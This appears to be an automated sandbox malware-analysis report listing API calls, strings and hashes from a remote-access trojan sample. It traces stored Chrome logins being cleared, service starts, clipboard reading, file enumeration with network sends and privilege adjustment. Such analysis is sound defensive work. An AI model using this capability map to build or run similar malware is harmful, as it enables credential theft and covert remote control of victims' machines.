                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteErrorFileLast
                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                          • API String ID: 2018770650-1062637481
                                          • Opcode ID: dc2b2689bc299d8874a4aac579e14b6bb7d4073350ebb0a6e73faa8ce1665e3c
                                          • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                          • Opcode Fuzzy Hash: dc2b2689bc299d8874a4aac579e14b6bb7d4073350ebb0a6e73faa8ce1665e3c
                                          • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                          • GetLastError.KERNEL32 ref: 004179D8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 3534403312-3733053543
                                          • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                          • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                          • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                          • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __floor_pentium4
                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                          • API String ID: 4168288129-2761157908
                                          • Opcode ID: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                          • Instruction ID: 22fd31c6184e07a9d3e8c26eafc68e38345e899adb4ac4f90a3aea4af7cb717d
                                          • Opcode Fuzzy Hash: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                          • Instruction Fuzzy Hash: BBC27E71D046288FDB25CE28DD407EAB3B5EB8530AF1541EBD80DE7241E778AE898F45
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00409293
                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                          • FindClose.KERNEL32(00000000), ref: 004093FC
                                            • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                            • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                            • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                          • FindClose.KERNEL32(00000000), ref: 004095F4
                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                          • String ID:
                                          • API String ID: 1824512719-0
                                          • Opcode ID: d5fff6ff147be0d9bf0e8b97956a8fab7f12df65085721ed718fed9da3bdc9ac
                                          • Instruction ID: 7a56ba3823c44b8d3dadbfeca74e3365e00ee059376cf1b582d15bdd70b30780
                                          • Opcode Fuzzy Hash: d5fff6ff147be0d9bf0e8b97956a8fab7f12df65085721ed718fed9da3bdc9ac
                                          • Instruction Fuzzy Hash: 8AB19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                          • String ID:
                                          • API String ID: 276877138-0
                                          • Opcode ID: 628d36ac3c64f627b3a8437270a5a78b3dcfd045bfbfd251d1d1fe9a009dd844
                                          • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                          • Opcode Fuzzy Hash: 628d36ac3c64f627b3a8437270a5a78b3dcfd045bfbfd251d1d1fe9a009dd844
                                          • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                          • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                          • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                          • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                          • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$FirstNextsend
                                          • String ID: 8eF$hPG$hPG
                                          • API String ID: 4113138495-2076665626
                                          • Opcode ID: a6c9c9649a55c42556727ff727ad14387c41d165ee427d48925338df36ff0517
                                          • Instruction ID: abfa5a3658aec55442980c0effbd4670719d50d4d7308f226e3cac976b3f196c
                                          • Opcode Fuzzy Hash: a6c9c9649a55c42556727ff727ad14387c41d165ee427d48925338df36ff0517
                                          • Instruction Fuzzy Hash: CB2195315082019BC314FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA09C65B
                                          APIs
                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                            • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                            • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,00475300,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137E1
                                            • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateInfoParametersSystemValue
                                          • String ID: ,aF$Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                          • API String ID: 4127273184-3126330168
                                          • Opcode ID: 1dafd4e115d1579546cfd655b47399d1506d96e03fc201f2c1b7b85ae65ff372
                                          • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                          • Opcode Fuzzy Hash: 1dafd4e115d1579546cfd655b47399d1506d96e03fc201f2c1b7b85ae65ff372
                                          • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                          APIs
                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                          • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                          • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                          • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID: SETTINGS
                                          • API String ID: 3473537107-594951305
                                          • Opcode ID: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
                                          • Instruction ID: e87eb13c1a863bb520e8110b03cd0e44f0123e9e346c2db4eb51eb31bea7c0b5
                                          • Opcode Fuzzy Hash: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
                                          • Instruction Fuzzy Hash: 23E01276600B21EBDB211FB1AC8CD467F25E7C9B533140075FA0582271CB758840DA58
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004096A5
                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstH_prologNext
                                          • String ID:
                                          • API String ID: 1157919129-0
                                          • Opcode ID: 5e708330bfbdb9036aa787329a800d88489fa4c70442028eebd1807c100a849e
                                          • Instruction ID: 095255599cc0af9be2c5710cd9f248f54336688560ad7ccdcde9a73cf5c292f5
                                          • Opcode Fuzzy Hash: 5e708330bfbdb9036aa787329a800d88489fa4c70442028eebd1807c100a849e
                                          • Instruction Fuzzy Hash: CB813C729001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                          • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                          • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                          • String ID:
                                          • API String ID: 4212172061-0
                                          • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                          • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                          • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                          • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID: p'E$JD
                                          • API String ID: 1084509184-908320845
                                          • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                          • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                          • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                          • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                          • String ID:
                                          • API String ID: 2829624132-0
                                          • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                          • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                          • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                          • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                          • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                          • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                          • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                          • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                          • ExitProcess.KERNEL32 ref: 0044338F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                          • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                          • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                          • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                          APIs
                                          • OpenClipboard.USER32(00000000), ref: 0040B74C
                                          • GetClipboardData.USER32(0000000D), ref: 0040B758
                                          • CloseClipboard.USER32 ref: 0040B760
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Clipboard$CloseDataOpen
